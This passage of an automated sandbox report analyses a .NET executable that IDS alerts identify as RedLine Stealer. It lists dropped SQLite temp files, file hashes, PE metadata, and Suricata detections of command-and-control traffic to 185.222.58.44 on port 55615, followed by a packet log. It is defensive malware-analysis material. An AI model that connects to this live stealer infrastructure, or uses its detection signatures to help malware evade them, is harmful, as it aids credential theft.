                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF14E.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF15E.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF16F.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF17F.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF190.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpF1A1.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):114688
                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Entropy (8bit):7.624351100765213
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                              File name:yGu4YUwMl6.exe
                                                                                                                                              File size:589'824 bytes
                                                                                                                                              MD5:1161b525009e7448837a658eecc04275
                                                                                                                                              SHA1:2cad4c2f589760f6ae6830acb122a9d5eb9c66de
                                                                                                                                              SHA256:7b9c9e71110c3980f1803a7438f507eadea9b078e59a61d551e21e1cae8ad5e5
                                                                                                                                              SHA512:c85c524a09fc182b3472405b22372c2d6350b2df199d21805980d26215fc5ad075c41b5fdf371c3ddc85e5930e745426f21f0c7d50aa8c7114b2d3fb9451d034
                                                                                                                                              SSDEEP:12288:9xgmj7oTFHFO1ZhzfQiCwxRyOTBfdgZUxX18:75oTFHU1H5CwxRyu/xl
                                                                                                                                              TLSH:9EC4CED03B767319DEA45A34D559EDB982A11E78B005BEE75AEC3F83358C211AE0CF48
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ... ....@.. .......................`............`................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:62ceac86b2968ea2

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x4906c6
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x67B28EC3 [Mon Feb 17 01:20:03 2025 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:4
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:4
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:4
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x906740x4f.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x1220.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x20000x8e6cc0x8e8003c08da8d04b8a20fa500c2b14aff817fFalse0.8524208470394737data7.6358286098036405IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rsrc0x920000x12200x1400f95e2e453b4a35a8452f594710a0625cFalse0.287890625data4.76780412138502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .reloc0x940000xc0x200e92cf4c02fedb35899f1828b11219e90False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                              Resources

                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                              RT_ICON0x921180xda8Device independent bitmap graphic, 26 x 64 x 32, image size 33280.2823226544622426
                                                                                                                                              RT_GROUP_ICON0x92ec00x14data1.1
                                                                                                                                              RT_GROUP_ICON0x92ed40x14data1.05
                                                                                                                                              RT_VERSION0x92ee80x336data0.42944038929440387

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                              Version Infos

                                                                                                                                              DescriptionData
                                                                                                                                              Translation0x0000 0x04b0
                                                                                                                                              CommentsWinFormsSample
                                                                                                                                              CompanyNameMcro
                                                                                                                                              FileDescription
                                                                                                                                              FileVersion6.11.0.0
                                                                                                                                              InternalNameZPVX.exe
                                                                                                                                              LegalCopyrightCopyright Mcro
                                                                                                                                              LegalTrademarks
                                                                                                                                              OriginalFilenameZPVX.exe
                                                                                                                                              ProductNameWinFormsSample
                                                                                                                                              ProductVersion6.11.0.0
                                                                                                                                              Assembly Version6.11.0.0

                                                                                                                                              Network Behavior

                                                                                                                                              Suricata IDS Alerts

                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2025-02-21T19:26:35.949638+01001800000Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect1192.168.2.449734185.222.58.4455615TCP
                                                                                                                                              2025-02-21T19:26:35.949638+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.449734185.222.58.4455615TCP
                                                                                                                                              2025-02-21T19:26:40.980727+01002045000ET MALWARE RedLine Stealer - CheckConnect Response1185.222.58.4455615192.168.2.449734TCP
                                                                                                                                              2025-02-21T19:26:41.172955+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.449734185.222.58.4455615TCP
                                                                                                                                              2025-02-21T19:26:44.425031+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1185.222.58.4455615192.168.2.449734TCP
                                                                                                                                              2025-02-21T19:26:44.425031+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.222.58.4455615192.168.2.449734TCP
                                                                                                                                              2025-02-21T19:26:44.479705+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.449738185.222.58.4455615TCP

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Feb 21, 2025 19:26:35.295285940 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:35.300484896 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:35.300569057 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:35.317444086 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:35.322432995 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:35.668544054 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:35.673679113 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:35.907294989 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:35.949637890 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:40.975482941 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:40.975519896 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:40.980726957 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:40.980815887 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.172713995 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.172894001 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.172925949 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.172955036 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:41.172960043 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.172995090 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.173006058 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:41.215226889 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:41.261674881 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:41.261744976 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.261877060 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:41.269360065 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:41.269382954 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.751168966 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.751344919 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:41.770749092 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:41.770773888 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.771856070 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:41.824651003 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:42.225039005 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:42.271336079 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:42.644593000 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:42.645200968 CET44349737104.26.12.31192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:42.645282984 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:42.647321939 CET49737443192.168.2.4104.26.12.31
                                                                                                                                              Feb 21, 2025 19:26:44.419666052 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.420229912 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.425030947 CET5561549734185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.425107002 CET4973455615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.425360918 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.425442934 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.425841093 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.426059008 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.431801081 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.431878090 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.432343960 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.432374001 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.432435989 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.432446003 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.432473898 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.432501078 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.432506084 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.432531118 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.432598114 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.433549881 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.433579922 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.433650017 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.436886072 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.436914921 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.436958075 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.437006950 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.437936068 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.438005924 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.438550949 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.438580036 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.438616037 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.438627958 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.438648939 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.438657045 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.438676119 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.438685894 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.438747883 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.439138889 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.439204931 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.479491949 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.479705095 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.527625084 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.527720928 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.575752974 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.575879097 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.623600960 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.625817060 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.671546936 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:44.671652079 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:44.719588995 CET5561549738185.222.58.44192.168.2.4
